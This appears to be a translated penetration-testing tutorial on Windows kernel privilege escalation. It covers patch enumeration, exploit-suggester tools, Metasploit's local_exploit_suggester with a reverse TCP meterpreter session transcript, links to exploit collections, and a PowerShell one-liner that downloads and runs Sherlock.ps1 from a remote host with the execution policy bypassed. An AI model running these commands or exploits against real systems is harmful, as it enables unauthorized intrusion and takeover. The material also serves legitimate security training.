Privilege Escalation - Windows Kernel Privilege Escalation
Contents
- Learning objectives
- Overview of kernel overflow privilege escalation
- Kernel overflow privilege escalation steps
- Patch comparison method
- 1. Manually enumerating installed patches
- 2. Comparing patches to find candidate vulnerabilities
- 3. Exploit collections
- Semi-automatic exploitation with MSF
- Fully automatic privilege escalation with CS
Learning objectives
- Understand Windows kernel privilege escalation
- Master the commands used for Windows kernel privilege escalation
- Master the steps of a Windows kernel privilege escalation
- Master manual kernel privilege escalation
- Master semi-manual privilege escalation with MSF
- Master fully automatic privilege escalation with CS
Overview of kernel overflow privilege escalation
An overflow vulnerability, in full a buffer overflow vulnerability, is a correctable defect in a program: it arises when code writes more data into a buffer than the buffer was allocated to hold, so the excess overwrites adjacent memory. Buffer overflows are among the most common memory-safety errors and one of the most powerful and classic classes of vulnerability used to break into systems. A successful exploit can change the value of variables in memory, hijack the process's control flow, execute malicious code and ultimately take control of the host.
Exploiting a Windows kernel overflow is a very general privilege escalation method: code that runs in the kernel is not subject to the security checks the kernel enforces on user-mode processes, so an attacker can use it to bypass the restrictions the system imposes on an ordinary user. Whether it works depends on whether the target has been patched. If the patch for a given vulnerability is not installed and the target is affected, the attacker uploads a local exploit program to the target and runs it to obtain SYSTEM (or Administrator) privileges.
Kernel overflow privilege escalation steps
- Information gathering (OS version, architecture, installed patches, presence of antivirus/EDR, network topology)
- Select candidate privilege escalation EXPs based on the gathered information
- Upload the EXP and execute it to escalate privileges
Patch comparison method
1. Manually enumerating installed patches
After obtaining a shell as an ordinary user on the target, run one of the following commands to list the patches installed on the system:
systeminfo
or
wmic qfe get caption,description,hotfixid,installedon
(wmic is deprecated on current Windows 10/11 builds; the PowerShell cmdlet Get-HotFix returns the same information.)
In the screenshot only a handful of patches were installed. The attacker looks for bulletins whose KB number is not in the list and picks the matching privilege escalation EXP; a table of privilege escalation vulnerabilities and their corresponding patches for each Windows version is linked from the original post. Note that since October 2016 Windows 7/Server 2008 R2 (and all later versions) receive security fixes as cumulative monthly rollups, so the absence of an individual KB number does not by itself prove that a fix is missing: check whether a later rollup that supersedes it is installed before concluding the host is vulnerable.
2. Comparing patches to find candidate vulnerabilities
Project 1: Windows Exploit Suggester
Download: https://github.com/GDSSecurity/Windows-Exploit-Suggester
The tool compares the patches installed on the system against Microsoft's security bulletin database and identifies vulnerabilities that may allow privilege escalation; all it needs from us is the target's system information. Caveat: Microsoft stopped publishing the bulletin spreadsheet this tool downloads in 2017, so it is only reliable for hosts that have not been patched since then; wesng (below) is its maintained successor.
Usage:
First update the vulnerability database, which produces an .xls file such as 2020-08-20-mssb.xls:
python2 windows-exploit-suggester.py --update
or ./windows-exploit-suggester.py --update
Then run the following on the target to collect its system information and save it as sysinfo.txt:
systeminfo > sysinfo.txt
Finally, run the following to check whether the system has exploitable privilege escalation vulnerabilities:
python2 windows-exploit-suggester.py -d 2020-08-20-mssb.xls -i sysinfo.txt
As the screenshot shows, the run lists a series of vulnerabilities present on the target system.
Project 2: WindowsVulnScan
https://github.com/chroblert/WindowsVulnScan
Environment: Windows Server 2016
Upload KBCollect.ps1 to the target and run it with PowerShell to collect the patch information; the result is written to KB.json in the current directory.
Then run the scanner with the -u parameter to update its vulnerability database first, and compare the collected patch information against it.
Project 3: wesng
https://github.com/bitsadmin/wesng (the successor to Windows Exploit Suggester; it takes the same systeminfo output and understands patch supersedence)
Project 4: Vulmap
https://github.com/vulmon/Vulmap
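A worked example of the patch comparison that the manual method and the tools above perform, written here as an added Python illustration and not code from Windows-Exploit-Suggester, wesng or any other project listed: it parses `systeminfo` output for the NT version and installed KBs, compares them with a small bulletin table, and treats a later cumulative rollup as superseding an older fix, so that a missing per-bulletin KB is not reported as a vulnerability on its own. The sample systeminfo text is constructed, the BULLETINS and ROLLUPS tables are illustrative and must be verified against MSRC before use, and the function names are my own.

```python
import re
from datetime import date

# Constructed `systeminfo` excerpt from a Windows 7 SP1 x64 host (not from the page).
SAMPLE_SYSTEMINFO = """\
Host Name:                 WIN7-TEST
OS Name:                   Microsoft Windows 7 Ultimate
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2533623
                           [02]: KB3045171
                           [03]: KB4474419
"""

# Illustrative bulletin table. KB numbers are the per-bulletin fixes as Microsoft
# published them and dates are their release dates; verify every entry against
# MSRC or the exploit collections linked on this page before relying on it.
BULLETINS = [
    {"id": "MS10-092", "fixes": {"KB2305420"}, "released": date(2010, 12, 14),
     "os": {"6.0", "6.1"}, "exploit": "exploit/windows/local/ms10_092_schelevator"},
    {"id": "MS14-058", "fixes": {"KB3000061"}, "released": date(2014, 10, 14),
     "os": {"6.0", "6.1", "6.2", "6.3"}, "exploit": "exploit/windows/local/ms14_058_track_popup_menu"},
    {"id": "MS15-051", "fixes": {"KB3045171"}, "released": date(2015, 5, 12),
     "os": {"6.0", "6.1", "6.2", "6.3"}, "exploit": "exploit/windows/local/ms15_051_client_copy_image"},
    {"id": "MS16-032", "fixes": {"KB3143141"}, "released": date(2016, 3, 8),
     "os": {"6.1", "6.2", "6.3", "10.0"}, "exploit": "exploit/windows/local/ms16_032_secondary_logon_handle_privesc"},
    {"id": "CVE-2018-8120", "fixes": {"KB4103712", "KB4103718"}, "released": date(2018, 5, 8),
     "os": {"6.1"}, "exploit": "standalone PoC from the collections linked on this page"},
]

# Cumulative rollups: installing one supersedes every earlier fix for that OS line.
# Since October 2016 Windows 7/2008 R2 only ship fixes this way, so a missing
# per-bulletin KB no longer proves the host is vulnerable. Constructed, one entry.
ROLLUPS = {"KB4012215": ("6.1", date(2017, 3, 14))}

# The numeric version (6.0-6.3 or 10.0 followed by a 4-5 digit build) and the
# "[NN]: KBxxxxxx" lines are locale independent, so the label text
# ("OS Version:" / "OS 版本:") is deliberately not relied on.
VERSION_RE = re.compile(r"\b(6\.[0-3]|10\.0)\.(\d{4,5})\b")
HOTFIX_RE = re.compile(r"\[\d+\]:\s*(KB\d+)")


def parse_systeminfo(text):
    """Return (nt_version, build, installed_kbs) from raw `systeminfo` output."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError("no Windows NT version string found in systeminfo output")
    return m.group(1), int(m.group(2)), set(HOTFIX_RE.findall(text))


def compare(nt_version, installed):
    """Compare installed KBs against the table for this OS line.

    Status is "patched" when the bulletin's own KB is present, "superseded by KB..."
    when a later cumulative rollup for the same OS is present, else "MISSING".
    """
    findings = []
    for b in BULLETINS:
        if nt_version not in b["os"]:
            continue  # bulletin does not apply to this OS line at all
        if b["fixes"] & installed:
            status = "patched"
        else:
            later = sorted(kb for kb in installed
                           if kb in ROLLUPS
                           and ROLLUPS[kb][0] == nt_version
                           and ROLLUPS[kb][1] >= b["released"])
            status = f"superseded by {later[0]}" if later else "MISSING"
        findings.append({"id": b["id"], "status": status, "exploit": b["exploit"]})
    return findings


def candidates(findings):
    """Only bulletins that are neither patched nor superseded are worth trying."""
    return [f for f in findings if f["status"] == "MISSING"]


if __name__ == "__main__":
    nt, build, kbs = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(f"NT {nt} build {build}, {len(kbs)} hotfixes installed")
    for f in compare(nt, kbs):
        print(f"{f['id']:<14} {f['status']:<26} {f['exploit']}")
```

Against the constructed sample, MS15-051 is reported as patched and the other four applicable entries as missing; adding the March 2017 rollup KB4012215 to the installed set turns MS10-092, MS14-058 and MS16-032 into "superseded" while CVE-2018-8120, released after that rollup, stays a candidate. That is exactly the distinction a bare KB-number diff cannot make.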
3. Exploit collections
Windows privilege escalation collections:
Project: https://github.com/lyshark/Windows-exploits
Project: https://github.com/SecWiki/windows-kernel-exploits
Project: https://github.com/klsfct/getshell
Project: https://github.com/k8gege/Ladon
Project: https://github.com/Ascotbe/KernelHub
Project: https://github.com/nomi-sec/PoC-in-GitHub
CVE reference: https://cve.mitre.org/index.html
Project: https://github.com/offensive-security/exploitdb (exploit-db source repository; the GitHub copy is archived and the repository is now maintained at gitlab.com/exploit-database/exploitdb)
Semi-automatic exploitation with MSF
Method one: the local_exploit_suggester module
Metasploit's built-in local exploits cover a range of privilege escalation vulnerabilities, and this module suggests which of them fit the current session based on the architecture, platform (the operating system running), session type and the modules' default options. That saves a lot of time compared with searching for local exploits by hand.
Usage, assuming we already have a session on the target:
bg
use post/multi/recon/local_exploit_suggester
set session 1
exploit
┌──(kali㉿kali)-[~/Desktop]
└─$ msfconsole -q
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lport 1123
lport => 1123
msf6 exploit(multi/handler) > set lhost eth0
lhost => eth0
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.3.180:1123
[*] Sending stage (200774 bytes) to 192.168.3.179
[*] Meterpreter session 1 opened (192.168.3.180:1123 -> 192.168.3.179:51121) at 2023-08-12 12:23:25 -0400
meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
View the full module info with the info, or info -d command.
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > exploit
[*] 192.168.3.179 - Collecting local exploits for x64/windows...
[*] 192.168.3.179 - 186 exploit checks are being tried...
[+] 192.168.3.179 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 192.168.3.179 - exploit/windows/local/cve_2019_1458_wizardopium: The target appears to be vulnerable.
[+] 192.168.3.179 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 192.168.3.179 - exploit/windows/local/cve_2020_1054_drawiconex_lpe: The target appears to be vulnerable.
[+] 192.168.3.179 - exploit/windows/local/cve_2021_40449: The service is running, but could not be validated. Windows 7/Windows Server 2008 R2 build detected!
[+] 192.168.3.179 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 192.168.3.179 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.3.179 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 192.168.3.179 - exploit/windows/local/ms15_078_atmfd_bof: The service is running, but could not be validated.
[+] 192.168.3.179 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 192.168.3.179 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 192.168.3.179 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 192.168.3.179 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 43 / 43
[*] 192.168.3.179 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
2 exploit/windows/local/cve_2019_1458_wizardopium Yes The target appears to be vulnerable.
3 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move Yes The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
4 exploit/windows/local/cve_2020_1054_drawiconex_lpe Yes The target appears to be vulnerable.
5 exploit/windows/local/cve_2021_40449 Yes The service is running, but could not be validated. Windows 7/Windows Server 2008 R2 build detected!
6 exploit/windows/local/ms10_092_schelevator Yes The service is running, but could not be validated.
7 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
8 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
9 exploit/windows/local/ms15_078_atmfd_bof Yes The service is running, but could not be validated.
10 exploit/windows/local/ms16_014_wmi_recv_notif Yes The target appears to be vulnerable.
11 exploit/windows/local/ms16_075_reflection Yes The target appears to be vulnerable.
12 exploit/windows/local/ms16_075_reflection_juicy Yes The target appears to be vulnerable.
13 exploit/windows/local/tokenmagic Yes The target appears to be vulnerable.
14 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
15 exploit/windows/local/always_install_elevated No The target is not exploitable.
16 exploit/windows/local/bits_ntlm_token_impersonation No The target is not exploitable.
17 exploit/windows/local/bypassuac_dotnet_profiler No The target is not exploitable.
18 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
19 exploit/windows/local/bypassuac_sdclt No The target is not exploitable.
20 exploit/windows/local/bypassuac_sluihijack No The target is not exploitable.
21 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
22 exploit/windows/local/capcom_sys_exec No The target is not exploitable.
23 exploit/windows/local/cve_2020_0796_smbghost No The target is not exploitable.
24 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable.
25 exploit/windows/local/cve_2020_1313_system_orchestrator No The target is not exploitable.
26 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable.
27 exploit/windows/local/cve_2020_17136 No The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
28 exploit/windows/local/cve_2021_21551_dbutil_memmove No The target is not exploitable.
29 exploit/windows/local/cve_2022_21882_win32k No The target is not exploitable.
30 exploit/windows/local/cve_2022_21999_spoolfool_privesc No The target is not exploitable. Windows 7 is technically vulnerable, though it requires a reboot.
31 exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver No The target is not exploitable.
32 exploit/windows/local/cve_2023_21768_afd_lpe No The target is not exploitable. The exploit only supports Windows 11 22H2
33 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
34 exploit/windows/local/ikeext_service No The check raised an exception.
35 exploit/windows/local/lexmark_driver_privesc No The target is not exploitable. No Lexmark print drivers in the driver store
36 exploit/windows/local/ms16_032_secondary_logon_handle_privesc No The target is not exploitable.
37 exploit/windows/local/ntapphelpcachecontrol No The check raised an exception.
38 exploit/windows/local/nvidia_nvsvc No The check raised an exception.
39 exploit/windows/local/panda_psevents No The target is not exploitable.
40 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
41 exploit/windows/local/srclient_dll_hijacking No The target is not exploitable. Target is not Windows Server 2012.
42 exploit/windows/local/virtual_box_opengl_escape No The target is not exploitable.
43 exploit/windows/local/webexec No The check raised an exception.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) >
As the output shows, the module quickly identifies and lists the exploits the system may be vulnerable to, which is very convenient. Even so, not every listed local exploit will work. Read the check result carefully: "The target appears to be vulnerable" means the module's check method confirmed a vulnerable condition, whereas "The service is running, but could not be validated" only means the OS build or a service matched and the exploit itself was not verified. Also note that the bypassuac_* modules are UAC bypasses rather than privilege escalations: they only help when the current user is already a member of the Administrators group.
The first attempt failed.
The second exploit succeeded.
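To make that distinction concrete, here is an added Python triage script (not part of the page or of Metasploit) that parses the [+] lines from a local_exploit_suggester run such as the one above, separates results the module actually validated from ones it merely detected by build or service, pushes UAC-bypass modules to the end, and returns the order in which an operator would try the rest. The embedded lines are a subset copied from the output above; the two result phrases are Metasploit's standard CheckCode messages; the function names are my own.

```python
import re

# Subset of the local_exploit_suggester output shown on this page.
SUGGESTER_OUTPUT = """\
[*] 192.168.3.179 - Collecting local exploits for x64/windows...
[+] 192.168.3.179 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 192.168.3.179 - exploit/windows/local/cve_2019_1458_wizardopium: The target appears to be vulnerable.
[+] 192.168.3.179 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 192.168.3.179 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 192.168.3.179 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.3.179 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] 192.168.3.179 - Valid modules for session 1:
"""

# "[+] <host> - <module>: <check message>"
HIT_RE = re.compile(r"^\[\+\]\s+(\S+)\s+-\s+(exploit/\S+?):\s+(.*)$")


def confidence(message):
    """Map Metasploit's CheckCode text to how much the result can be trusted.

    CheckCode::Appears  -> "The target appears to be vulnerable."
    CheckCode::Detected -> "The service is running, but could not be validated."
    """
    if message.startswith("The target appears to be vulnerable"):
        return "validated"
    if "could not be validated" in message:
        return "heuristic"
    return "unknown"


def kind(module):
    """UAC bypasses only help a user already in Administrators; they are not
    privilege escalation from a standard account, so they are ranked last."""
    name = module.rsplit("/", 1)[-1]
    return "uac-bypass" if name.startswith("bypassuac") else "privesc"


def triage(text):
    """Parse the [+] hit lines and order them: validated before heuristic,
    real privilege escalation before UAC bypass, then by module name."""
    rows = []
    for line in text.splitlines():
        m = HIT_RE.match(line)
        if not m:
            continue
        host, module, message = m.groups()
        rows.append({"host": host, "module": module,
                     "confidence": confidence(message), "kind": kind(module)})
    conf_rank = {"validated": 0, "heuristic": 1, "unknown": 2}
    kind_rank = {"privesc": 0, "uac-bypass": 1}
    rows.sort(key=lambda r: (conf_rank[r["confidence"]], kind_rank[r["kind"]], r["module"]))
    return rows


def attempt_order(rows):
    """Module names in the order an operator would try them (UAC bypasses excluded)."""
    return [r["module"] for r in rows if r["kind"] == "privesc"]


if __name__ == "__main__":
    for r in triage(SUGGESTER_OUTPUT):
        print(f"{r['confidence']:<10} {r['kind']:<11} {r['module']}")
```

On the sample the three validated privilege escalation modules come first, the validated UAC bypass after them, and the two "could not be validated" entries last, which matches the page's experience that the first suggestion is not necessarily the one that works.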
Method two: the enum_patches module
Metasploit's post/windows/gather/enum_patches module enumerates the installed hotfixes over WMI and reports which of a built-in list of security bulletins are missing, identified by bulletin and KB number. Usage:
use post/windows/gather/enum_patches
set session 1
exploit
Manual checks and custom MSF modules
When looking for candidate vulnerabilities in practice, it is best to combine manual and automated approaches.
Sherlock download: https://github.com/h1ck0r/Sherlock
This PowerShell script quickly finds vulnerabilities that may be usable for local privilege escalation. Its checks stop at the 2016 bulletins, and its original author has since replaced it with Watson for newer builds. Usage:
powershell -exec bypass -c IEX(New-Object Net.WebClient).DownloadString('http://192.168.3.151:8092/Sherlock.ps1')   (remote execution)
Import-Module <directory>\Sherlock.ps1   (local execution)
Find-AllVulns   (after loading the script, run the search)
Before the local variant will work we have to deal with PowerShell's execution policy.
On Windows client editions PowerShell's default execution policy is Restricted (Windows Server defaults to RemoteSigned): individual commands run, but scripts do not, including format and configuration files (.ps1xml), module script files (.psm1) and PowerShell script and profile files (.ps1). Batch .bat files are not affected, since cmd.exe runs them. The fix is to relax the policy, for example to RemoteSigned or Unrestricted, by running Set-ExecutionPolicy RemoteSigned or Set-ExecutionPolicy Unrestricted in PowerShell, or to start PowerShell with -ExecutionPolicy RemoteSigned. The remote one-liner above already does this with -exec bypass, which avoids changing the machine-wide setting. Note that the execution policy is a safety feature for users, not a security boundary, so overriding it is not a bypass in the exploit sense.
Selecting and exploiting a vulnerability
Taking the Sherlock results above as an example, MS14-058:
We pick the first usable result.
The result gives us the exploit-db exploit script.
The script can be downloaded; it is a Ruby (.rb) Metasploit module, so it has to be placed under Metasploit's exploit module directory and the framework reloaded. The framework directory is /usr/share/metasploit-framework/modules/exploits; user modules can also go under ~/.msf4/modules/exploits/, which survives framework updates. In either case put the file in the windows/local subdirectory so its module path makes sense, then run reload_all in msfconsole or restart it.
The downloaded script is 35301.rb. Here I created a directory named 35301 and put 35301.rb in it; when MSF restarts it reports that the new module has been loaded.
Note that this particular exploit (EDB-ID 35301, the MS14-058 TrackPopupMenu module) already ships with Metasploit as exploit/windows/local/ms14_058_track_popup_menu, as the local_exploit_suggester output above shows, so importing it by hand is only necessary for exploits that are not yet in the framework.
While testing this I ran into a few problems. The first is that our payload defaults to x86, so the exploit errors out with an architecture mismatch; but even with the architecture matched I still did not get a shell.
Searching GitHub for a matching privilege escalation program
Privilege escalation succeeded.
Once we have checked the patches on the target and confirmed the vulnerability exists, we can upload the local overflow program to the target and run it. Here we chose CVE-2018-8120.
The exploit program can be downloaded from the following locations (each includes usage instructions):
- Windows privilege escalation collection: https://github.com/lyshark/Windows-exploits
- Windows kernel overflow exploit collection: https://github.com/SecWiki/windows-kernel-exploits
- Privilege escalation tools for various platforms: https://github.com/klsfct/getshell
Execution:
As the screenshot shows, before the exploit program runs whoami reports the ordinary user, and after it runs whoami reports system. The full procedure in msfconsole is as follows: